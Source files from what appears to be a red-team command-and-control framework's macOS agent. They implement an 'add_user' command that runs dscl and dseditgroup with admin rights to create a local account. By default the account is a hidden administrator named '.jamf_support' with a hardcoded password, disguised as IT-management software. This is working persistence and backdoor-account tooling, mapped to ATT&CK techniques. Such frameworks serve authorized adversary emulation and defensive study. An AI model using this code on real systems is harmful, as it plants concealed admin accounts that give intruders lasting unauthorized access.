File: Payload_Types/apfell/mythic/agent_functions/add_user.py
from CommandBase import *
import json
from MythicResponseRPC import *


class AddUserArguments(TaskArguments):
    def __init__(self, command_line):
        super().__init__(command_line)
        self.args = {
            "password": CommandParameter(
                name="password",
                type=ParameterType.String,
                description="p@55w0rd_here for new user",
                required=False,
                default_value="p@55w0rd_here",
            ),
            "passwd": CommandParameter(
                name="passwd",
                type=ParameterType.Credential_Value,
                description="password of the user that will execute the commands",
            ),
            "user": CommandParameter(
                name="user",
                type=ParameterType.Credential_Account,
                description="username that will execute the commands",
            ),
            "createprofile": CommandParameter(
                name="createprofile",
                type=ParameterType.Boolean,
                required=False,
                default_value=False,
                description="create a user profile or not",
            ),
            "usershell": CommandParameter(
                name="usershell",
                type=ParameterType.String,
                description="which shell environment should the new user have",
                required=False,
                default_value="/bin/bash",
            ),
            "primarygroupid": CommandParameter(
                name="primarygroupid",
                type=ParameterType.Number,
                required=False,
                description="POSIX primary group id for the new account",
                default_value=80,
            ),
            "uniqueid": CommandParameter(
                name="uniqueid",
                type=ParameterType.Number,
                required=False,
                default_value=403,
                description="POSIX unique id for the user",
            ),
            "homedir": CommandParameter(
                name="homedir",
                type=ParameterType.String,
                required=False,
                description="/Users/.jamf_support",
            ),
            "realname": CommandParameter(
                name="realname",
                type=ParameterType.String,
                required=False,
                default_value="Jamf Support User",
                description="Full user name",
            ),
            "username": CommandParameter(
                name="usernane",
                type=ParameterType.String,
                required=False,
                default_value=".jamf_support",
                description="POSIX username for account",
            ),
            "hidden": CommandParameter(
                name="hidden",
                type=ParameterType.Boolean,
                required=False,
                default_value=False,
                description="Should the account be hidden from the logon screen",
            ),
            "admin": CommandParameter(
                name="admin",
                type=ParameterType.Boolean,
                required=False,
                default_value=True,
                description="Should the account be an admin account",
            ),
        }

    async def parse_arguments(self):
        self.load_args_from_json_string(self.command_line)


class AddUserCommand(CommandBase):
    cmd = "add_user"
    needs_admin = True
    help_cmd = "add_user"
    description = "Add a local user to the system by wrapping the Apple binary, dscl."
    version = 1
    is_exit = False
    is_file_browse = False
    is_process_list = False
    is_download_file = False
    is_remove_file = False
    is_upload_file = False
    author = "@its_a_feature_"
    argument_class = AddUserArguments
    attackmapping = ["T1136", "T1169"]

    async def create_tasking(self, task: MythicTask) -> MythicTask:
        if task.args.get_arg("hidden"):
            resp = await MythicResponseRPC(task).register_artifact(
                artifact_instance="dscl . create /Users/{} IsHidden 1".format(task.args.get_arg("user")),
                artifact_type="Process Create",
            )
        else:
            resp = await MythicResponseRPC(task).register_artifact(
                artifact_instance="dscl . create /Users/{}".format(task.args.get_arg("user")),
                artifact_type="Process Create",
            )
        resp = await MythicResponseRPC(task).register_artifact(
            artifact_instance="dscl . create /Users/{} UniqueID {}".format(
                task.args.get_arg("user"),
                task.args.get_arg("uniqueid")
            ),
            artifact_type="Process Create",
        )
        resp = await MythicResponseRPC(task).register_artifact(
            artifact_instance="dscl . create /Users/{} PrimaryGroupID {}".format(
                task.args.get_arg("user"),
                task.args.get_arg("primarygroupid")
            ),
            artifact_type="Process Create",
        )
        resp = await MythicResponseRPC(task).register_artifact(
            artifact_instance="dscl . create /Users/{} NFSHomeDirectory \"{}\"".format(
                task.args.get_arg("user"),
                task.args.get_arg("homedir")
            ),
            artifact_type="Process Create",
        )
        resp = await MythicResponseRPC(task).register_artifact(
            artifact_instance="dscl . create /Users/{} RealName \"{}\"".format(
                task.args.get_arg("user"),
                task.args.get_arg("realname")
            ),
            artifact_type="Process Create",
        )
        resp = await MythicResponseRPC(task).register_artifact(
            artifact_instance="dscl . create /Users/{} UserShell {}".format(
                task.args.get_arg("user"),
                task.args.get_arg("usershell")
            ),
            artifact_type="Process Create",
        )
        if task.args.get_arg("admin"):
            resp = await MythicResponseRPC(task).register_artifact(
                artifact_instance="dseditgroup -o edit -a {} -t user admin".format(task.args.get_arg("user")),
                artifact_type="Process Create",
            )
        resp = await MythicResponseRPC(task).register_artifact(
            artifact_instance="dscl . passwd /Users/{} \"{}\"".format(
                task.args.get_arg("user"),
                task.args.get_arg("password")
            ),
            artifact_type="Process Create",
        )
        if task.args.get_arg("createprofile"):
            resp = await MythicResponseRPC(task).register_artifact(
                artifact_instance="mkdir \"{}\"".format(task.args.get_arg("homedir")),
                artifact_type="Process Create",
            )
            resp = await MythicResponseRPC(task).register_artifact(
                artifact_instance="cp -R \"/System/Library/User Template/English.lproj/\" \"{}\"".format(
                    task.args.get_arg("homedir")
                ),
                artifact_type="Process Create",
            )
            resp = await MythicResponseRPC(task).register_artifact(
                artifact_instance="chown -R {}:staff \"{}\"".format(
                    task.args.get_arg("user"),
                    task.args.get_arg("homedir")
                ),
                artifact_type="Process Create",
            )
        return task

    async def process_response(self, response: AgentResponse):
        pass

File: Example_Payload_Type/agent_code/add_user.js
exports.add_user = function(task, command, params){
    try{
        // Add a user with dscl to the local machine
        let config = JSON.parse(params);
        let admin = true;
        let hidden = true;
        let username = ".jamf_support";
        let password = "P@55w0rd_Here";
        let realname = "Jamf Support User";
        let homedir = "/Users/";
        let uniqueid = 403;
        let primarygroupid = 80; //this is the admin group
        let usershell = "/bin/bash";
        let createprofile = false;
        let user = ""; //username of the user with sudo capability to do these commands
        let passwd = ""; //password of the user with sudo capability to do these commands
        if(config.hasOwnProperty("admin") && typeof config['admin'] == 'boolean'){ admin = config['admin']; }
        if(config.hasOwnProperty("hidden") && typeof config['hidden'] == 'boolean'){ hidden = config['hidden']; }
        if(config.hasOwnProperty("username") && config['username'] != ''){ username = config['username']; }
        if(config.hasOwnProperty("password") && config['password'] != ''){ password = config['password']; }
        if(config.hasOwnProperty("realname") && config['realname'] != ''){ realname = config['realname']; }
        if(config.hasOwnProperty("uniqueid") && config['uniqueid'] != -1){ uniqueid = config['uniqueid']; }
        else if(config.hasOwnProperty('uniqueid') && typeof config['uniqueid'] == 'string' && config['uniqueid'] != ''){ uniqueid = parseInt(config['uniqueid']); }
        if(config.hasOwnProperty("primarygroupid") && config['primarygroupid'] != -1){ primarygroupid = config['primarygroupid']; }
        else if(config.hasOwnProperty('primarygroupid') && typeof config['primarygroupid'] == 'string' && config['primarygroupid'] != ''){ primarygroupid = parseInt(config['primarygroupid']); }
        if(config.hasOwnProperty("usershell") && config['usershell'] != ''){ usershell = config['usershell']; }
        if(config.hasOwnProperty("createprofile") && typeof config['createprofile'] == "boolean"){ createprofile = config['createprofile']; }
        if(config.hasOwnProperty("homedir") && config['homedir'] != ''){ homedir = config['homedir']; }
        else{ homedir += username; }
        if(config.hasOwnProperty("user") && config['user'] != ''){ user = config['user']; }
        else{ return "User's name is required to do sudo commands"; }
        if(config.hasOwnProperty("passwd") && config['passwd'] != ''){ passwd = config['passwd']; }
        else{ return "User's password is required to do sudo commands"; }
        // now do our series of dscl commands to set up the account
        try{
            let cmd = "dscl . create /Users/" + username;
            currentApp.doShellScript(cmd, {administratorPrivileges:true, userName:user, password:passwd});
            if(hidden){
                cmd = "dscl . create /Users/" + username + " IsHidden 1";
                currentApp.doShellScript(cmd, {administratorPrivileges:true, userName:user, password:passwd});
            }
            cmd = "dscl . create /Users/" + username + " UniqueID " + uniqueid;
            currentApp.doShellScript(cmd, {administratorPrivileges:true, userName:user, password:passwd});
            cmd = "dscl . create /Users/" + username + " PrimaryGroupID " + primarygroupid;
            currentApp.doShellScript(cmd, {administratorPrivileges:true, userName:user, password:passwd});
            cmd = "dscl . create /Users/" + username + " NFSHomeDirectory \"" + homedir + "\"";
            currentApp.doShellScript(cmd, {administratorPrivileges:true, userName:user, password:passwd});
            cmd = "dscl . create /Users/" + username + " RealName \"" + realname + "\"";
            currentApp.doShellScript(cmd, {administratorPrivileges:true, userName:user, password:passwd});
            cmd = "dscl . create /Users/" + username + " UserShell " + usershell;
            currentApp.doShellScript(cmd, {administratorPrivileges:true, userName:user, password:passwd});
            if(admin){
                cmd = "dseditgroup -o edit -a " + username + " -t user admin";
                currentApp.doShellScript(cmd, {administratorPrivileges:true, userName:user, password:passwd});
            }
            cmd = "dscl . passwd /Users/" + username + " \"" + password + "\"";
            currentApp.doShellScript(cmd, {administratorPrivileges:true, userName:user, password:passwd});
            if(createprofile){
                cmd = "mkdir \"" + homedir + "\"";
                currentApp.doShellScript(cmd, {administratorPrivileges:true, userName:user, password:passwd});
                cmd = "cp -R \"/System/Library/User Template/English.lproj/\" \"" + homedir + "\"";
                currentApp.doShellScript(cmd, {administratorPrivileges:true, userName:user, password:passwd});
                cmd = "chown -R " + username + ":staff \"" + homedir + "\"";
                currentApp.doShellScript(cmd, {administratorPrivileges:true, userName:user, password:passwd});
            }
            return {"user_output": "Successfully ran the commands to create the user", "completed": true};
        }catch(error){
            return{"user_output": error.toString(), "status": "error", "completed": true};
        }
     }catch(error){
        return {"user_output": error.toString(), "status": "error", "completed": true};
     }

};
